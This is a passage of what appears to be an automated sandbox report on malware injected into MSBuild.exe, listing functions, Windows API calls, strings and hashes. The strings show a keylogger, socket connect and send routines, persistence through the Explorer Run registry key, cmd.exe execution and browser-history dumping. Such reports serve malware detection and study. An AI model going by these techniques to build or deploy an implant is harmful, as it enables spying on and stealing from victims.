                                                • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                Function 0044E13B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                • _free.LIBCMT ref: 0044E1A0
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                Function 00446F43 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                • _free.LIBCMT ref: 00446F7D
                                                • _free.LIBCMT ref: 00446FA4
                                                • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                Function 0044F79D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 0044F7B5
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 0044F7C7
                                                • _free.LIBCMT ref: 0044F7D9
                                                • _free.LIBCMT ref: 0044F7EB
                                                • _free.LIBCMT ref: 0044F7FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                Function 004432E7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00443305
                                                  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                • _free.LIBCMT ref: 00443317
                                                • _free.LIBCMT ref: 0044332A
                                                • _free.LIBCMT ref: 0044333B
                                                • _free.LIBCMT ref: 0044334C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                • IsWindowVisible.USER32(?), ref: 004167A1
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessWindow$Open$TextThreadVisible
                                                • String ID: (FG
                                                • API String ID: 3142014140-2273637114
                                                • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                Function 0044D459 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                Download Yara Rule
                                                APIs
                                                • _strpbrk.LIBCMT ref: 0044D4A8
                                                • _free.LIBCMT ref: 0044D5C5
                                                  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,00401962,?,?,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
                                                  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
                                                  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                • String ID: *?$.
                                                • API String ID: 2812119850-3972193922
                                                • Opcode ID: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                • Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
                                                • Opcode Fuzzy Hash: 5e5281a7710df1af016e28c269081ecff319cf0b763ae5275be817dad69de84b
                                                • Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
                                                Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                • String ID: XCG$`AG$>G
                                                • API String ID: 2334542088-2372832151
                                                • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                Function 004426D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 00442714
                                                • _free.LIBCMT ref: 004427DF
                                                • _free.LIBCMT ref: 004427E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                • API String ID: 2506810119-4083458154
                                                • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                • String ID: /sort "Visit Time" /stext "$8>G
                                                • API String ID: 368326130-2663660666
                                                • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                Function 004098A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTimewsprintf
                                                • String ID: Offline Keylogger Started
                                                • API String ID: 465354869-4114347211
                                                • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread$LocalTime$wsprintf
                                                • String ID: Online Keylogger Started
                                                • API String ID: 112202259-1258561607
                                                • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                • __dosmaperr.LIBCMT ref: 0044AAFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID: `@
                                                • API String ID: 2583163307-951712118
                                                • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetLocalTime.KERNEL32(?), ref: 00404946
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                Strings
                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Create$EventLocalThreadTime
                                                • String ID: KeepAlive | Enabled | Timeout:
                                                • API String ID: 2532271599-1507639952
                                                • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEventHandleObjectSingleWait
                                                • String ID: Connection Timeout
                                                • API String ID: 2055531096-499159329
                                                • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,762337E0,?), ref: 004127AD
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,762337E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                • API String ID: 1818849710-1051519024
                                                • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                • String ID: bad locale name
                                                • API String ID: 3628047217-1405518554
                                                • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: Control Panel\Desktop
                                                • API String ID: 1818849710-27424756
                                                • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateValue
                                                • String ID: TUF
                                                • API String ID: 1818849710-3431404234
                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExecuteShell
                                                • String ID: /C $cmd.exe$open
                                                • API String ID: 587946157-3896048727
                                                • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014DF
                                                • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetLastInputInfo$User32.dll
                                                • API String ID: 2574300362-1519888992
                                                • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
